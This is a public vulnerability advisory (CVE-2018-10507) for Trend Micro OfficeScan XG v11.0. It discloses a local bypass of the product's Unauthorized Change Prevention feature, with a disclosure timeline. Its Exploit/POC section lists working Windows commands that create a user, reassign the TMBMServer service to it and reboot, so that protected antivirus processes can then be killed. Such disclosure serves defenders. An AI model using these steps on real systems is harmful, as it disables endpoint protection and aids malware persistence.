99 lines
No EOL
2.6 KiB
Text
99 lines
No EOL
2.6 KiB
Text
[+] Credits: John Page (aka hyp3rlinx)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-v11.0-UNAUTHORIZED-CHANGE-PREVENTION-SERVICE-BYPASS.txt
|
|
[+] ISR: Apparition Security
|
|
|
|
|
|
|
|
***Greetz: indoushka|Eduardo|Dirty0tis***
|
|
|
|
|
|
|
|
Vendor:
|
|
=============
|
|
www.trendmicro.com
|
|
|
|
|
|
|
|
Product:
|
|
===========
|
|
OfficeScan XG v11.0
|
|
|
|
|
|
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
|
|
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
|
|
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
|
|
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
|
|
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Unauthorized Change Prevention Bypass
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2018-10507
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Attackers or malwarez that can access the system hosting the OfficeScan XG AV, can bypass the antivirus protection feature that prevents unauthorized changes
|
|
from being made like killing protected OfficeScan XG processes such as "PccNTMon.exe".
|
|
|
|
|
|
References:
|
|
============
|
|
https://success.trendmicro.com/solution/1119961
|
|
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
|
|
1) net user hacker abc123 /add
|
|
|
|
2) sc.exe config "TMBMServer" obj= ".\hacker" password= "pwnage"
|
|
|
|
3) net user hacker /delete
|
|
|
|
4) shutdown /r
|
|
|
|
Done!, now kill "PccNTMon.exe" or whatever...
|
|
|
|
requires Admin permissions to exploit
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Local
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Medium
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: June 29, 2017
|
|
Vendor releases critical patch and advisory : June 5, 2018
|
|
June 7, 2018 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |